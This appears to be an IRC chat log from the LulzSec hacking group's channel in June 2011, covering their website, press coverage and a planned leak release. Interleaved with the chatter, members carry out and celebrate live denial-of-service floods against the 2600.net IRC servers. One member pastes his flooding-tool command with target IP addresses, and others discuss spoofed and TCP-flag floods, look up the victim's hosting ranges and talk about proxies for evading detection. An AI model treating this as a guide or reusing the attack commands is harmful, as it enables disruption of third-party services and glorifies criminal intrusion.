tflow Jun 03 15:47:02 <storm> you backdoor that shit already? Jun 03 15:47:20 <tflow> backdoor what Jun 03 15:47:37 <tflow> :P Jun 03 15:47:38 <storm> i thought that was a server you owned Jun 03 15:47:39 <storm> xD Jun 03 15:47:57 <tflow> oh Jun 03 15:47:59 <tflow> no lol Jun 03 15:48:04 <tflow> that's our lulzsecurity.com server Jun 03 15:48:07 <joepie91> tflow, cat access.log grep wc -l Jun 03 15:48:10 <joepie91> er Jun 03 15:48:11 <storm> ah Jun 03 15:48:16 <joepie91> cat access.log wc -l Jun 03 15:48:18 <joepie91> lefail Jun 03 15:48:48 <tflow> 12668 Jun 03 15:50:16 <joepie91> mmm, not bad Jun 03 15:50:28 <joepie91> but cloudflare would probably be moar accurate Jun 03 15:50:33 <tflow> yeah Jun 03 15:50:36 <tflow> that's in like 10 mins Jun 03 15:53:05 <joepie91> what is? Jun 03 15:53:18 <tflow> how long the site has been up on the next serv

Jun 03 15:53:21 <tflow> new* Jun 03 15:54:25 <storm> i havent been able to load the site Jun 03 15:54:26 <storm> at all Jun 03 15:54:34 <joepie91> people really do love lulzsec Jun 03 15:54:35 <joepie91> "I can only hope they are charged with Treason. That can still get you the death penelty, if I'm not mistaken." Jun 03 15:55:01 <Sabu> true Jun 03 15:55:02 <joepie91> btw, tflow, might want to turn down cloudflare p rotection level to essentially off Jun 03 15:55:05 <Sabu> treason for what exacty Jun 03 15:55:06 <Sabu> ahah Jun 03 15:55:08 <joepie91> idk? Jun 03 15:55:29 <tflow> yeah i did joepie91 Jun 03 15:55:37 <joepie91> ok Jun 03 15:55:37 <joepie91> also Jun 03 15:55:38 <joepie91> Seven a.m., waking up in the morning, Jun 03 15:55:38 <joepie91> Gotta get ready, gotta head downstairs Jun 03 15:55:38 <joepie91> Gotta have my hacks, gotta have my snacks Jun 03 15:55:38 <joepie91> Seein' everything , the time is goin' Jun 03 15:55:38 <joepie91> Tickin' on and on, every's hackin' Jun 03 15:55:38 <joepie91> Gotta get into the database Jun 03 15:55:38 <joepie91> I hear a smash, I see the feds Jun 03 15:55:38 <joepie91> Kickin' down the front door Jun 03 15:55:38 <joepie91> Smashin' in the back door Jun 03 15:55:38 <joepie91> Gotta make my mind up, Jun 03 15:55:39 <joepie91> How can I escape? Jun 03 15:55:40 <joepie91> It's Friday, Friday Jun 03 15:55:41 <joepie91> It's Fuck FBI Friday Jun 03 15:55:42 <joepie91> Everybody's lookin' forward to the hackin', hack in' Jun 03 15:55:43 <joepie91> Friday, Friday Jun 03 15:55:44 <joepie91> Hackin' it on Friday Jun 03 15:55:45 <joepie91> Everybody's lookin' forward to the break in Jun 03 15:55:50 <Topiary> any flood attempts so far tflow? Jun 03 15:55:50 <tflow> lol nice Jun 03 15:55:53 <tflow> Topiary, ^ Jun 03 15:55:54 <tflow> Topiary, nope Jun 03 15:56:01 <tflow> any flood attempts will be killed by cloudflare Jun 03 15:56:09 <tflow> plus the site is running on a dedi Jun 03 15:56:14 <tflow> so it should be all good Jun 03 15:56:23 <Topiary> that's awesome joepie Jun 03 15:56:26 <Topiary> did you write that? Jun 03 15:56:36 <joepie91> noes Jun 03 15:56:38 <Topiary> also hackin' = leakend Jun 03 15:56:40 <joepie91> http://www.escapistmagazine.com/forums/read/18.2 88904-Hacking-Group-LulzSec-gears-up-for-Fuck-FBI-Friday?page=2 Jun 03 15:56:43 <Topiary> must change to leakend Jun 03 15:56:52 <joepie91> tflow: http floods get through sometimes Jun 03 15:56:57 <joepie91> it takes cloudflare 1 or 2 days Jun 03 15:56:59 <joepie91> to detect the, Jun 03 15:57:00 <joepie91> them* Jun 03 15:57:02 <joepie91> and block them Jun 03 15:57:03 <joepie91> >.> Jun 03 15:57:09 <Sabu> yea but im a superb admin Jun 03 15:57:14 <joepie91> then again, a http flood won't do much if you ar e running lighttpd/nginx Jun 03 15:57:15 <Sabu> I'll deter the attacks Jun 03 15:57:28 <storm> Sabu Jun 03 15:57:31 <Sabu> hi Jun 03 15:57:41 <storm> you should setup the ircd server to block incoming udp a

ttacks Jun 03 15:57:46 <storm> since irc doesnt need udp at all Jun 03 15:57:51 <joepie91> also, it seems Cloudflare is happy with their ne w customers in anon, lulzsec, etc Jun 03 15:57:51 <joepie91> :P Jun 03 15:59:00 <storm> lol Jun 03 15:59:01 <Topiary> CloudFlare CEO = our homeboy Jun 03 15:59:05 <Topiary> BitCoin owner = our homeboy Jun 03 15:59:08 <Topiary> Pastebin owner = our homeboy Jun 03 15:59:13 <Topiary> Mediafire owner = faggot Jun 03 15:59:23 <storm> lets pwn mediafire Jun 03 15:59:29 <storm> they sux anyway Jun 03 15:59:48 <joepie91> lol Jun 03 15:59:51 <joepie91> mediafire removed it? Jun 03 15:59:51 <joepie91> aldo Jun 03 15:59:52 <joepie91> also* Jun 03 15:59:54 <joepie91> "bitcoin owner" Jun 03 15:59:55 <joepie91> no exist Jun 03 15:59:59 <Topiary> on what? Jun 03 16:00:20 <Topiary> oh right Jun 03 16:00:33 <tflow> just @bitcoinmedia Jun 03 16:00:36 <joepie91> there is no central owner, remember? :P Jun 03 16:07:49 <joepie91> google news frontpage: http://arstechnica.com/te ch-policy/news/2011/06/lulz-sony-hackers-deny-responsibility-for-misuse-of-leake d-data.ars Jun 03 16:08:22 <tflow> awesome image Jun 03 16:08:26 <lol> lol at tht pic xD Jun 03 16:08:52 <lol> thts awesome xD Jun 03 16:09:05 <joepie91> lol ye Jun 03 16:09:10 <joepie91> ars has been posting some great pics Jun 03 16:09:12 <joepie91> idk who makes them Jun 03 16:09:13 <joepie91> but they are epic Jun 03 16:11:11 <storm> glad i dont have a ps3 Jun 03 16:13:17 <joepie91> Be proactive about following security best pract ices and data security compliance requirements. Don't be a Sony. Jun 03 16:13:20 <joepie91> lol'd Jun 03 16:13:29 <joepie91> do I smell a new meme? Jun 03 16:13:33 <joepie91> "Don't be a Sony" Jun 03 16:13:37 <joepie91> http://www.pcworld.com/businesscenter/article/22 9351/sony_hacked_again_how_not_to_do_network_security.html Jun 03 16:13:39 <Topiary> Sony I am disappoint Jun 03 16:13:56 <Topiary> Pony Slaystation! Jun 03 16:14:03 <joepie91> lol Jun 03 16:14:49 <Topiary> is anyone still on 2600? Jun 03 16:14:52 <Topiary> if so: disperse Jun 03 16:14:54 <Topiary> fuck that shithole Jun 03 16:15:00 <Topiary> in our channel anyway Jun 03 16:17:03 <trollpoll> i think (hope) nobody is still there Jun 03 16:18:19 <joepie91> also Jun 03 16:18:19 <joepie91> http://www.spiegel.de/netzwelt/web/0,1518,766167 ,00.html Jun 03 16:18:23 <joepie91> and well, the channel died out a bit Jun 03 16:18:25 <joepie91> after the botflood Jun 03 16:19:08 <Topiary> I hope none of us are still there Jun 03 16:20:19 <storm> Topiary I agree ;p Jun 03 16:20:25 <storm> their server got owned Jun 03 16:20:28 <storm> after we left Jun 03 16:20:45 <storm> collective was gone as well as every single server i kne w of Jun 03 16:20:45 <storm> ;x

Jun 03 16:22:13 * joepie91 is still logged on Jun 03 16:22:34 <storm> do /map Jun 03 16:22:41 <storm> all of the servers are gone Jun 03 16:22:42 <storm> lols Jun 03 16:22:54 <Topiary> yeah none of us should be in #lulzsec Jun 03 16:23:06 <Topiary> we decided to ditch such a filthy room :x Jun 03 16:23:08 <joepie91> - collective.2600.net ----------------------------- Users: 359 (56.2%) Jun 03 16:23:08 <joepie91> - `- blackbeard.2600.net ------------------------- Users: 0 (0.0%) Jun 03 16:23:08 <joepie91> - djslocker.2600.net ---------------------- Users: 92 (14.4%) Jun 03 16:23:08 <joepie91> - bartholomew.2600.net -------------------- Users: 179 (28.0%) Jun 03 16:23:08 <joepie91> `- services.2600.net ----------------------- Users: 9 (1.4%) Jun 03 16:23:08 <joepie91> - End of /MAP Jun 03 16:23:10 <lol> you've killed all their server xD? Jun 03 16:23:14 <storm> no Jun 03 16:23:18 <storm> oh i see Jun 03 16:23:22 <storm> madjack isnt linked Jun 03 16:23:25 <storm> weird Jun 03 16:23:33 <storm> i killed their servers hard last night Jun 03 16:23:43 <storm> forgot about it running for like 20 mins just ganking Jun 03 16:23:48 <lol> hit collective it has most users xD Jun 03 16:23:52 <storm> lolol Jun 03 16:23:54 <storm> sure thing Jun 03 16:23:56 <storm> 1 sec Jun 03 16:25:50 <storm> root@YNService(~/.local)]#./nsdapx 208.111.35.75 202.103 .67.101 6667 0 20 0 Jun 03 16:25:51 <storm> Sending packets of size 40.... Jun 03 16:26:05 <storm> Sending packets of size 40....x 208.111.35.75 218.108.23 5.101 6667 0 20 0 Jun 03 16:26:07 <storm> lolz Jun 03 16:26:36 <storm> i should hit them with tons of spoofage Jun 03 16:26:37 <storm> from Jun 03 16:26:40 <storm> 101.101.101.101 Jun 03 16:26:43 <storm> lolololol Jun 03 16:27:09 <Topiary> they're gonna be so fucking angry Jun 03 16:28:48 <joepie91> - Closing Link: s514735fe.adsl.wanadoo.nl (Ping timeout: 240 seconds) Jun 03 16:28:48 <joepie91> ~ Connection closed Jun 03 16:28:49 <joepie91> interesting Jun 03 16:30:20 <storm> lol its their fault Jun 03 16:30:29 <storm> for being fucktwits Jun 03 16:35:06 * pwnsauce (pwnsauce@HA-4fq.4hj.tbgr2g.IP) has joined #pur e-elite Jun 03 16:35:11 <storm> pwnsauce :D Jun 03 16:35:15 <pwnsauce> hey! Jun 03 16:35:19 <pwnsauce> im a bit fucked Jun 03 16:35:19 <storm> sup cutie Jun 03 16:35:22 <pwnsauce> not much Jun 03 16:35:39 <storm> HACK US, AND WE WILL BOMB YOU Jun 03 16:35:48 <lol> This is the second time hackers have targeted Sony's com puter network - in April they stole data from more than 100 million accounts. Jun 03 16:35:49 <lol> only second? Jun 03 16:36:00 <lol> im sure the score is at like HACKERS 13 SONY 0 Jun 03 16:36:14 <pwnsauce> LOL Jun 03 16:36:18 <pwnsauce> we winrar Jun 03 16:36:24 <pwnsauce> Kayla <3

Jun 03 16:38:35 <storm> 16:38 -!- djslocker.2600.net ------------------------------ Users: 145 Jun 03 16:38:48 <storm> (34.6%) Jun 03 16:38:48 <storm> 16:38 -!- `- blackbeard.2600.net ------------------------- Users: 0 Jun 03 16:38:48 <storm> (0.0%) Jun 03 16:38:48 <storm> 16:38 -!- bartholomew.2600.net -------------------- Users: 265 Jun 03 16:38:48 <storm> (63.2%) Jun 03 16:38:48 <storm> 16:38 -!`- services.2600.net ----------------------- Users: 9 Jun 03 16:38:48 <storm> (2.1%) Jun 03 16:38:48 <storm> collective is gone Jun 03 16:38:50 <Topiary> >bartholomew Jun 03 16:38:53 <Topiary> hello newcomer Jun 03 16:38:59 <Topiary> shall we pop its DDoS cherry? Jun 03 16:39:12 <storm> i hit it last night Jun 03 16:39:14 <storm> but yeah Jun 03 16:39:15 <storm> :P Jun 03 16:40:46 <pwnsauce> hehehehe Jun 03 16:40:56 <pwnsauce> SYN storm ahead me bretheren Jun 03 16:41:16 <storm> lol Jun 03 16:41:18 <storm> not SYN Jun 03 16:41:20 <storm> urg Jun 03 16:41:21 <storm> ! Jun 03 16:41:22 <storm> <# Jun 03 16:41:24 <storm> <3* Jun 03 16:41:27 <storm> urgent ftw Jun 03 16:41:35 <pwnsauce> AAAH Jun 03 16:41:37 <pwnsauce> :D Jun 03 16:41:43 <storm> their servers are like URGENT MESSAGE FROM LULZSEC Jun 03 16:41:44 <storm> drop Jun 03 16:41:45 <storm> drop Jun 03 16:41:45 <storm> drop Jun 03 16:41:51 <pwnsauce> try PSH also Jun 03 16:41:52 <joepie91> guys Jun 03 16:41:53 <joepie91> http://www.wired.com/threatlevel/2011/06/interne t-a-human-right Jun 03 16:41:58 <storm> yeah i use push a lot Jun 03 16:42:00 <pwnsauce> Internet IS a right! Jun 03 16:42:04 <joepie91> A United Nations report said Friday that disconn ecting people from the internet is a human rights violation and against internat ional law. Jun 03 16:42:07 <pwnsauce> brb need food Jun 03 16:42:07 <storm> i can hit with any tcp flag Jun 03 16:42:08 <storm> ;p Jun 03 16:42:10 <pwnsauce> :D Jun 03 16:45:28 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 16:45:53 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit e Jun 03 16:50:56 <storm> 16:50 -!- collective.2600.net ----------------------------- Users: 190 Jun 03 16:50:56 <storm> (44.8%) Jun 03 16:50:56 <storm> 16:50 -!- `- blackbeard.2600.net ------------------------- Users: 0 Jun 03 16:50:56 <storm> (0.0%) Jun 03 16:50:56 <storm> 16:50 -!- djslocker.2600.net ---------------------- Users: 225 Jun 03 16:50:56 <storm> (53.1%)

Jun 03 16:50:56 <storm> 16:50 -!`- services.2600.net ----------------------- Users: 9 Jun 03 16:50:56 <storm> (2.1%) Jun 03 16:50:59 <storm> gone Jun 03 16:51:37 <Topiary> amazing Jun 03 16:51:40 <Topiary> fucking 2600 Jun 03 16:52:05 <Topiary> you're like our resident sniper sitting in the c row's nest with a goddamn deck-shattering electricity blast Jun 03 16:52:25 <Topiary> enemy ships being riddled with holes Jun 03 16:52:26 <storm> RPF: Jun 03 16:52:27 <storm> ROFL Jun 03 16:52:35 <storm> wow Jun 03 16:52:38 <storm> you're epic Jun 03 16:52:47 <joepie91> lol Jun 03 16:52:49 <joepie91> Topirya Jun 03 16:52:52 <joepie91> Topiary * Jun 03 16:52:55 <joepie91> write a fucking book Jun 03 16:52:58 <joepie91> I'm serious Jun 03 16:52:58 <storm> ^ Jun 03 16:52:58 <joepie91> lol Jun 03 16:53:02 <storm> yeah dude lofl Jun 03 16:53:38 <storm> 700 seconds to completely down that server. on both of t hem Jun 03 16:53:45 <Sabu> lol\ Jun 03 16:53:49 <storm> thats with 200mbps though Jun 03 16:54:04 <storm> my gigabit was so ownage before i lost it Jun 03 16:54:06 <storm> :( RIP Jun 03 16:54:16 <Topiary> you guys have to just picture ourselves as an aw esome boat crew, and storm is just chilling in that nest with a mounted rail gun scorching the living fuck out of incoming fleets Jun 03 16:54:17 <storm> shit downed servers in 200seconds Jun 03 16:54:33 <storm> rofl Jun 03 16:54:53 <joepie91> Topiary Jun 03 16:54:56 <joepie91> why is lulzsec not trending yet Jun 03 16:54:57 <joepie91> on twitter Jun 03 16:55:02 <Topiary> :( because we lame Jun 03 16:55:07 <storm> trending how Jun 03 16:55:08 <trollpoll> lol Jun 03 16:55:16 <Topiary> twitter trending is rigged Jun 03 16:55:27 * tflow has quit (Ping timeout: 121 seconds) Jun 03 16:55:28 <storm> @LulzSec Im in irc.2600.net and everyone is dropping lik e flies. Also, did you see those threats by @AnonymousNL Jun 03 16:55:36 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit e Jun 03 16:55:38 <storm> uh oh Jun 03 16:55:38 <trollpoll> the twitter algorithm is not for a long term top ic... Jun 03 16:55:40 <storm> THREATZ? Jun 03 16:56:01 <Topiary> the twitter trend system is based on mainstream "forgot what I was talking about yesterday" ADHD logic Jun 03 16:56:13 <trollpoll> yep Jun 03 16:56:17 <Topiary> just like 20-minute TV episodes Jun 03 16:56:22 <trollpoll> so, create a new hashtag Jun 03 16:56:31 <Topiary> #FuckFBIFriday Jun 03 16:56:32 <trollpoll> if you wanna be tt.. Jun 03 16:56:32 <Topiary> is our current Jun 03 16:56:38 <trollpoll> lol Jun 03 16:56:46 <storm> it's funny though Topiary Jun 03 16:56:47 <storm> cause like Jun 03 16:56:52 <storm> if you read 2600's shit

Jun 03 16:56:58 <storm> its like they're sucking up Jun 03 16:57:19 <Topiary> we should just tell them we'll DDoS them until t hey forbid Jester to chill there Jun 03 16:57:21 <storm> but yet they took our channels registery Jun 03 16:57:38 <storm> not even that, i'm more pissed about the channel being t aken over Jun 03 16:57:41 <storm> thats bunk as hell Jun 03 16:57:48 <storm> admins dont do that lame shit Jun 03 16:58:14 <storm> uh oh Jun 03 16:58:19 <storm> i think i nulled their server Jun 03 16:58:41 <Topiary> pity, looks like they lost another frigate Jun 03 16:58:54 <joepie91> lool Jun 03 16:58:56 <storm> i really did bust its null cherry i guess Jun 03 16:59:01 <storm> cause i didnt null it last night Jun 03 16:59:10 <Topiary> it capsized Jun 03 16:59:17 <Topiary> not getting drained for at least 7 minutes Jun 03 16:59:24 <Topiary> then more flood? Jun 03 16:59:27 <storm> sure Jun 03 16:59:35 <storm> djslocker.2600.net next Jun 03 16:59:39 * tflow has quit (Ping timeout: 121 seconds) Jun 03 16:59:55 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit e Jun 03 17:00:32 <Sabu> http://www.youtube.com/watch?v=u6LgIWr47LQ = hhahhahahha watch them get on the black guy Jun 03 17:01:02 <joepie91> is Awinee SERIOUSLY still tweeting to you guys? Jun 03 17:01:07 <joepie91> he sad he is getting ignored? Jun 03 17:01:19 <Sabu> yeah hes gay Jun 03 17:01:20 <Sabu> ..win 2 Jun 03 17:01:35 <joepie91> Quote #1171: "<joepie91> they could make the Reg ulatory Agency of E-Porn (RAEP) and I would care less" (added by Spoonzy at 01:3 7 AM, April 02, 2011) Jun 03 17:01:40 <joepie91> effexor \o/ Jun 03 17:04:08 <storm> its back up now Jun 03 17:04:10 <storm> and rofl sabu Jun 03 17:04:21 <storm> this videos funny Jun 03 17:08:05 <joepie91> storm Jun 03 17:08:09 <joepie91> where is collective hosted? Jun 03 17:08:28 <storm> Host Virtual, Inc VR-208-111-35-0-24 (NET-208-111-35-0-1 ) 208.111.35.0 - 208.111.35.255 Jun 03 17:08:43 <storm> VR HOSTED VRHOS-ARIN-19-0002 (NET-208-111-32-0-1) 208.11 1.32.0 - 208.111.47.255 Jun 03 17:10:25 * Topiary has changed the topic to: pE Research and expl oit development Coding, designing, penetrating, packeting, laughing at our cri ppled opponents Jun 03 17:10:34 <joepie91> @MrEGrizzly Jun 03 17:10:34 <joepie91> Mr. E Grizzly Jun 03 17:10:34 <joepie91> @LulzSec 504 error on WWW.lulzsecurity.com Jun 03 17:10:34 <joepie91> 3 minutes ago via Twitter for Android Jun 03 17:10:45 * lol has quit (A TLS packet with unexpected length was re ceived.) Jun 03 17:10:48 <Topiary> nope it's up joepie Jun 03 17:10:54 <storm> its not up for me Jun 03 17:10:58 <storm> hasnt been Jun 03 17:11:05 <Topiary> I guess it's still down in a few areas Jun 03 17:11:32 <joepie91> give me a sec Jun 03 17:11:34 <joepie91> I think... Jun 03 17:11:37 <joepie91> we are getting too much traffic Jun 03 17:11:37 <joepie91> lol Jun 03 17:11:56 <pwnsauce> FFS Jun 03 17:12:07 * lol (parr0t@HA-i98.11n.cc0br2.IP) has joined #pure-elite

Jun 03 17:12:20 <joepie91> ohwait Jun 03 17:12:21 <joepie91> that was 503 Jun 03 17:12:27 <joepie91> 504 is just a cloudflare bork Jun 03 17:12:38 <joepie91> ED had the issue with too much traffic Jun 03 17:12:42 <joepie91> ED was too big for cloudflare o_O Jun 03 17:12:58 <joepie91> as in, there were errors because there were so m any requests a second, the servers couldn't handle it Jun 03 17:13:03 <Topiary> apparently we're handling 50-100 legit requests a second Jun 03 17:16:45 <joepie91> ye, it's not capacity faill Jun 03 17:16:48 <joepie91> fail* Jun 03 17:16:49 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 17:16:52 <joepie91> there seem to be issues with cloudflare Jun 03 17:16:58 <joepie91> someone else gets connection refused Jun 03 17:17:05 <joepie91> so I suppose cloudflare has to fix their shit Jun 03 17:17:20 <joepie91> with anonnews, ED, and lulzsec... they've probab ly been handling a bit more traffic lately :D Jun 03 17:18:25 <pwnsauce> true dat Jun 03 17:19:43 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit e Jun 03 17:31:03 <storm> hmm Jun 03 17:31:10 <storm> looks like others are taking after us Jun 03 17:31:14 <storm> and ddosing collective Jun 03 17:31:16 <storm> cause im not Jun 03 17:31:25 <storm> [17:31] [+sillygooth(+i)] [2:collective/#2600(+lmnt)] [ Lag: 32 (??)] Jun 03 17:31:57 <storm> their ddos is slow though Jun 03 17:39:19 <Sabu> yeah Jun 03 17:39:25 <Sabu> thats some laerm Jun 03 17:39:26 <Sabu> lamer Jun 03 17:39:31 <storm> lol Jun 03 17:39:33 <storm> isnt me! Jun 03 17:40:08 <joepie91> anyone feels like playing age of empires 2 Jun 03 17:40:12 <joepie91> in multiplayer Jun 03 17:40:15 <joepie91> with me and a friend? Jun 03 17:40:19 <storm> aoe sucks Jun 03 17:40:19 <storm> well Jun 03 17:40:22 <storm> i suck at aoe Jun 03 17:40:26 <joepie91> lol Jun 03 17:40:44 <storm> i play another multiplayer game from the 90's Jun 03 17:40:54 <joepie91> no but srsly Jun 03 17:41:00 <joepie91> we are trying to get a 2v2 going Jun 03 17:41:03 <joepie91> but missing player ;_; Jun 03 17:41:03 <storm> 2d overhead capture the flag/strategic game Jun 03 17:41:04 <storm> xD Jun 03 17:41:11 <Topiary> storm: you ever play on the Dreamcast? Jun 03 17:41:19 <storm> yeah when i was a kid Jun 03 17:41:25 <Topiary> I still have one Jun 03 17:41:29 <storm> haha Jun 03 17:43:01 * trollpoll has quit (Quit: Leaving) Jun 03 17:44:36 <Sabu> yo stormsex Jun 03 17:44:43 <Sabu> dont waste no more resources on 2600 Jun 03 17:44:45 <Sabu> save your boxes Jun 03 17:44:50 <Sabu> we'll have another target Jun 03 17:45:53 <storm> ok Jun 03 17:45:57 <storm> will do broski Jun 03 17:45:59 <storm> :) Jun 03 17:46:09 <storm> rebooting to go play that game in the aforementioned Jun 03 17:46:14 <storm> afk guiz

Jun 03 17:46:15 Jun 03 17:46:18 Jun 03 17:46:18 Jun 03 17:46:21 Jun 03 17:46:25 Jun 03 17:46:29 Jun 03 18:31:53 ceived.) Jun 03 18:31:55 Jun 03 18:37:35 Jun 03 18:44:27 ceived.) Jun 03 18:44:35 Jun 03 18:58:59 ure-elite Jun 03 18:59:47 Jun 03 19:02:04 Jun 03 19:17:46 Jun 03 19:24:01 Jun 03 19:25:48 Jun 03 19:26:47 ure-elite Jun 03 19:26:54 Jun 03 19:28:34 Jun 03 19:28:38 Jun 03 19:29:50 Jun 03 19:30:28 Jun 03 19:30:31 Jun 03 19:30:33 Jun 03 19:30:45 Jun 03 19:30:46 Jun 03 19:40:20 Jun 03 19:47:34 Jun 03 19:54:52 e-elite Jun 03 19:57:18 Jun 03 19:57:22 Jun 03 19:57:23 Jun 03 19:57:31 Jun 03 19:59:11 Jun 03 19:59:13 Jun 03 19:59:17 Jun 03 19:59:22 Jun 03 19:59:32 ed Jun 03 19:59:43 Jun 03 19:59:50 Jun 03 20:00:11 Jun 03 20:00:17 Jun 03 20:00:19 Jun 03 20:00:24 Jun 03 20:00:26 Jun 03 20:00:28 Jun 03 20:00:41 s Jun 03 20:01:31 Jun 03 20:01:35 Jun 03 20:03:44 Jun 03 20:03:45 Jun 03 20:03:54

<Sabu> kk <Sabu> thx bro <pwnsauce> kk <storm> <3 sabu <storm> laters * storm detached * lol has quit (A TLS packet with unexpected length was re * * * * * lol (parr0t@HA-bdi.9ck.dqsjqe.IP) has joined #pure-elite pwnsauce has quit (Ping timeout: 121 seconds) lol has quit (A TLS packet with unexpected length was re lol (lol@HA-s5h.ho4.fu85s5.IP) has joined #pure-elite Palladium (Palladium@HA-kd2.1lr.tbgr2g.IP) has joined #p

<Palladium> Hi <lol> hi :D * Palladium has quit (Quit: Lost terminal) <Sabu> hi <[redacted]> hi * Palladium (Palladium@HA-kd2.1lr.tbgr2g.IP) has joined #p <Palladium> Hi <Sabu> hi <Sabu> what up niggles <[redacted]> can i haz op <[redacted]> joepie91- I love AoE 2 :D * Sabu gives channel operator status to [redacted] * Sabu gives channel operator status to Palladium * Sabu gives channel operator status to tflow * Sabu gives channel operator status to lol * joepie91 has quit (Ping timeout: 121 seconds) * Palladium has quit (Quit: Lost terminal) * joepie91 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pur <joepie91> well fuck <joepie91> AoE crashed my entire pc <joepie91> : <joepie91> did I miss anything? <tflow> no <tflow> you're in time <tflow> for fuckfbi <tflow> going to release in a few mins <tflow> but we can't upload it to tpb because tpb upload is bork <tflow> so we just have to do a plain .torrent file <tflow> :< <joepie91> oh <joepie91> let me log on frm lapy <joepie91> lappy* <joepie91> on what domain can I reach this server/ <joepie91> derp <joepie91> ?* <joepie91> hanging over keyboard typing sideways =/= succes <tflow> this irc? <tflow> there's no domain afaik <joepie91> well <joepie91> derp <joepie91> let me manually type the ip then :P

Jun 03 20:05:06 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 20:05:27 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit e Jun 03 20:06:05 * joepie92 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pur e-elite Jun 03 20:06:11 * joepie92 is now known as joepie91_laptop Jun 03 20:06:12 <joepie91_laptop> ohaithar Jun 03 20:06:26 <joepie91_laptop> lulz from bed :D Jun 03 20:06:55 <tflow> same Jun 03 20:17:01 <joepie91_laptop> http://postimage.org/image/2nzrr8f44 Jun 03 20:17:28 <tflow> that's pretty old Jun 03 20:20:23 <joepie91_laptop> b14ck4dd3r == SanguineRose? Jun 03 20:20:31 <joepie91_laptop> writing style somewhat matches Jun 03 20:20:40 <joepie91_laptop> and yes I know it's old, just hadn';t se en the picture before :P Jun 03 20:22:00 <joepie91_laptop> also Jun 03 20:22:15 <joepie91_laptop> apparently lulzsec has inspired people t o use both cloudflare and bitcoin Jun 03 20:22:35 <joepie91_laptop> Topiary: for added win, get Cloudflare t o accept Bitcoins for their Pro package Jun 03 20:28:56 <joepie91_laptop> @attritionorg Jun 03 20:28:56 <joepie91_laptop> attrition.org Jun 03 20:28:56 <joepie91_laptop> @securitygen does @CloudFlare still fail to protect a site if you attack it using IP instead of DNS name? Jun 03 20:29:00 * joepie91_laptop facepalms Jun 03 20:29:23 * Neuron (Neuron@HA-t6n.62t.o0m95d.IP) has joined #pure-el ite Jun 03 20:29:28 <Neuron> o/ hey gusy Jun 03 20:30:03 <Sabu> hi sexypie Jun 03 20:30:41 <Neuron> hey baby want a good time? Jun 03 20:30:44 * Neuron shakes ass Jun 03 20:31:11 <joepie91_laptop> Neuron Jun 03 20:31:12 <joepie91_laptop> hai Jun 03 20:31:14 <Sabu> doing new lelak now Jun 03 20:31:19 <Neuron> whats the leak? Jun 03 20:31:27 <Neuron> i logged on :P im not sure what FuckFBIFriday is Jun 03 20:31:32 <joepie91_laptop> Neuron, can you pm the non-cinfu socks t o joepie91 (my desktop) again? Jun 03 20:31:35 <joepie91_laptop> I might need it :P Jun 03 20:31:47 <Neuron> joepie91_laptop: i no longer have a non cinfu so cks i canceled it :P Jun 03 20:31:51 <joepie91_laptop> oh Jun 03 20:31:53 <joepie91_laptop> : Jun 03 20:31:56 <Neuron> all mine are cinfu :( Jun 03 20:32:01 <Neuron> ill work on getting more Jun 03 20:32:05 <joepie91_laptop> where did you register them from Jun 03 20:32:06 <joepie91_laptop> the cinfus Jun 03 20:32:06 <Neuron> Sabu: we in 2600? Jun 03 20:32:12 <joepie91_laptop> because I got caught by maxmind today >. > Jun 03 20:32:15 <Sabu> http://infragardatlanta.org/ Jun 03 20:32:18 <Sabu> no. neuron. Jun 03 20:32:21 <Sabu> stay away from there Jun 03 20:32:40 <Neuron> Sabu: was just asking. If we were i was just gon na work on socialing Jun 03 20:33:06 <tflow> check twitter feed Jun 03 20:33:08 <Neuron> joepie91_laptop: you have to register from the s ame place your ip is Jun 03 20:33:10 <tflow> we just released

Jun 03 20:33:11 Jun 03 20:33:29 Jun 03 20:33:30 Jun 03 20:33:35 Jun 03 20:33:39 Jun 03 20:33:46 Jun 03 20:33:49 Jun 03 20:33:50 Jun 03 20:33:52 Jun 03 20:33:59 Jun 03 20:34:10 Jun 03 20:34:12 Jun 03 20:34:38 his chan Jun 03 20:35:44 owboy *i code* Jun 03 20:36:36 k into bed Jun 03 20:36:38 Jun 03 20:36:39 Jun 03 20:36:43 Jun 03 20:36:43 Jun 03 20:36:48 Jun 03 20:37:55 Jun 03 20:38:47 Jun 03 20:39:27 Jun 03 20:39:28 Jun 03 20:39:31 Jun 03 20:39:33 Jun 03 20:39:50 Jun 03 20:40:20 Jun 03 20:40:56 Jun 03 20:41:07 Jun 03 20:41:22 Jun 03 20:41:23 Jun 03 20:41:27 Jun 03 20:41:40 Jun 03 20:41:41 services, and a Jun 03 20:41:49 Jun 03 20:41:54 Jun 03 20:41:57 Jun 03 20:42:04 ebservers Jun 03 20:42:13 Jun 03 20:43:11 Jun 03 20:43:12 Jun 03 20:45:47 Jun 03 20:45:51 Jun 03 20:48:19 Jun 03 20:49:45 AH Jun 03 20:51:13 Jun 03 20:51:14 Jun 03 20:51:43 Jun 03 20:52:29 ite Jun 03 20:54:41 Jun 03 20:54:47 Jun 03 20:55:01

<tflow> :> <joepie91_laptop> I know <joepie91_laptop> I did <joepie91_laptop> got busted for open proxy >.> <Neuron> lmfao <Neuron> send me 1bc and ill order one for you <joepie91_laptop> so I need something non-public <joepie91_laptop> ah <joepie91_laptop> thats ok too <joepie91_laptop> lemme get out of bed <Neuron> rgr <Neuron> whos tflow ? <tflow> i've been here since the start of lulzsec, just not in t <Neuron> <joepie91> ahh i see.. hi o/ im neuron the local keyboard c Neuron, check your pm for a sec so I can get bac

